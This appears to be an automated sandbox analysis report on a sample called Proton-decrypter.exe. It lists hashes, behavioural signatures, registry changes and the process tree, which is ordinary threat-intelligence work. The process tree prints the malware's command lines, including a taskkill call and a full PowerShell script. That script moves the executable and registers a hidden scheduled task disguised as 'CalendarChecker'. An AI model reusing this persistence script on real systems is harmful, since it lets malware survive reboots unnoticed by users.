Analysis
- max time kernel: 117s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 18/01/2024, 20:56

Static task
- static1

Behavioral task
- behavioral1
  Sample: Proton-decrypter.exe
  Resource: win7-20231215-en

Behavioral task
- behavioral2
  Sample: Proton-decrypter.exe
  Resource: win10v2004-20231222-en
General
- Target: Proton-decrypter.exe
- Size: 6.7MB
- MD5: 3ab86f13c521e72bf4e8475ccd1e62e3
- SHA1: a1b2b1c4995ba4665d4db71653037f3075e111fb
- SHA256: 37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9
- SHA512: a56fcf131a3de1a1395746edda0c038f9e39cfb63b8c96d788f9cb1c5d6a3f28d253543968a253b143bafd6ccc7f39ff8932097fca2a5e3076b87343afc8652b
- SSDEEP: 49152:5vdi5Ifm0OErygxEb6Ns/CRptmctcmZxDit3KowoLGi9VDUIvR62BZrXDbS06DSi:cIHO7cifwIvRtSjRWipG5YF+Oz
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 1 IoC)
  Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only) | \??\F: | Proton-decrypter.exe

- Drops file in Windows directory (1 IoC)
  description | ioc | Process
  File created | C:\Windows\Explorer.7z | Proton-decrypter.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Kills process with taskkill (1 IoC)
  pid | Process
  2844 | taskkill.exe

- Modifies registry class (2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000_CLASSES\spica | Proton-decrypter.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000_CLASSES\spica\ = "1" | Proton-decrypter.exe

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid | Process
  1892 | AcroRd32.exe

- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  pid | Process
  2056 | Proton-decrypter.exe (4 entries)
  2804 | powershell.exe (3 entries)
  2056 | Proton-decrypter.exe (3 entries)
  2912 | powershell.exe (4 entries)

- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description | pid | Process
  Token: SeShutdownPrivilege | 2056 | Proton-decrypter.exe
  Token: SeDebugPrivilege | 2844 | taskkill.exe
  Token: SeDebugPrivilege | 2804 | powershell.exe
  Token: SeRestorePrivilege | 2756 | 7zFM.exe
  Token: 35 | 2756 | 7zFM.exe
  Token: SeDebugPrivilege | 2912 | powershell.exe

- Suspicious use of FindShellTrayWindow (2 IoCs)
  pid | Process
  2756 | 7zFM.exe (2 entries)

- Suspicious use of SetWindowsHookEx (3 IoCs)
  pid | Process
  1892 | AcroRd32.exe (3 entries)

- Suspicious use of WriteProcessMemory (22 IoCs)
  description | pid | Process | procid_target
  PID 2056 wrote to memory of 2844 | 2056 | Proton-decrypter.exe | 29 (3 entries)
  PID 2056 wrote to memory of 2804 | 2056 | Proton-decrypter.exe | 31 (3 entries)
  PID 2056 wrote to memory of 2696 | 2056 | Proton-decrypter.exe | 32 (3 entries)
  PID 2696 wrote to memory of 1892 | 2696 | cmd.exe | 35 (4 entries)
  PID 2056 wrote to memory of 1672 | 2056 | Proton-decrypter.exe | 38 (3 entries)
  PID 2804 wrote to memory of 2756 | 2804 | powershell.exe | 36 (3 entries)
  PID 2056 wrote to memory of 2912 | 2056 | Proton-decrypter.exe | 40 (3 entries)

- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.exe"
  - Enumerates connected drives
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2056

  Level 2: C:\Windows\system32\taskkill.exe
    Command line: "taskkill.exe" /PID 1256 /F
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID: 2844

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" Start-Process -FilePath "C:\Windows\Explorer.7z" -WindowStyle Minimized
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2804

    Level 3: C:\Program Files\7-Zip\7zFM.exe
      Command line: "C:\Program Files\7-Zip\7zFM.exe" "C:\Windows\Explorer.7z"
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      PID: 2756

  Level 2: C:\Windows\system32\cmd.exe
    Command line: "cmd" /c start "" "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.pdf"
    - Suspicious use of WriteProcessMemory
    PID: 2696

    Level 3: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Proton-decrypter.pdf"
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of SetWindowsHookEx
      PID: 1892

  Level 2: C:\Windows\system32\schtasks.exe
    Command line: "schtasks" /query /tn CalendarChecker
    PID: 1672

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -Command " $random = New-Object System.Random; $interval = $random.Next(1, 4); $sys_min = [int](Get-Date -format \"mm\") + (60 / $interval); $sys_sec = [int](Get-Date -format \"ss\") + (60 / $interval); $envir = $env:LOCALAPPDATA; $spica = (Get-Process -Id (Get-WmiObject Win32_Process -Filter \"ProcessId=$PID\").ParentProcessId).ProcessName.Replace(\"\r\n\",\"\") + \".exe\"; $file_path = (Get-Command -Name \"./$spica\").Source; Move-Item -Path $file_path -Destination $envir -Force; $action = New-ScheduledTaskAction -Execute ($envir + \"\$spica\") -Argument \"-WindowStyle Hidden\"; $settings = New-ScheduledTaskSettingsSet -DeleteExpiredTaskAfter (New-TimeSpan -Seconds 30) -ExecutionTimeLimit (New-TimeSpan -Hours 3) -RestartCount:3 -RestartInterval (New-TimeSpan -Minutes 10); $settings.StartWhenAvailable = $true; $description = \"Calendar\"; $taskName = \"CalendarChecker\"; $settings.DisallowStartIfOnBatteries = $false; $settings.StopIfGoingOnBatteries = $false; $trigger = New-ScheduledTaskTrigger -Daily -At (Get-Date).addSeconds(10); $trigger.StartBoundary = (Get-Date).AddHours($interval).addMinutes($sys_min).addSeconds($sys_sec).ToString(\"s\"); $trigger.EndBoundary = (Get-Date).AddDays(2).ToString(\"s\"); Register-ScheduledTask -TaskName $taskName -Description $description -Action $action -Settings $settings -Trigger $trigger; "
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2912
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 242KB
  MD5: 30a03040eeeb01b9d6ea7542712654da
  SHA1: 32767a0630e6b33d1355017e99b1b2cacd598093
  SHA256: a949ec428116489f5e77cefc67fea475017e0f50d2289e17c3eb053072adcf24
  SHA512: e204389f1cbfd74babeb948bab9e911a4565925996493a7aaf39cf2bb4d4d23a5ab5786eb829aa4b916582387e39f947f3a9fcf3edb240fc02832d26d860e4e9

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RUNV8AJ2J9WZYD8AJKM4.temp
  Filesize: 7KB
  MD5: 4564ca51b3659af058cb35196574663a
  SHA1: 66e715bf2803b9935ee23d0510f2a825142b35bd
  SHA256: b71ef447eb75e11263a067f3855efe0e4b14de37e71d84e9ffddb12f4b0c595d
  SHA512: 81364d1bf874126f9d2e86b23ff3053656aca7361296831ee615917f033ff90acb35893ab3f5eb6a56b87bd69b1c61b01f7f171e46d53b7c357f45505d82b589

- Filesize: 66KB
  MD5: e302b2076f95bdbfe8b39679a15e3ce3
  SHA1: 421710b728a323fbcc628316c4d41df291565157
  SHA256: b073f44de8f68134bdcd05017e42978638c3dad50a69639b50aa5180341164d1
  SHA512: 7840a12ec275b762a4930ed349529cab4107308af17915418a19f49f11e3e413af81486e67c94ee6e44a44cfa9855e4a626739aaf1bea94b7fbc8bae2dd630c7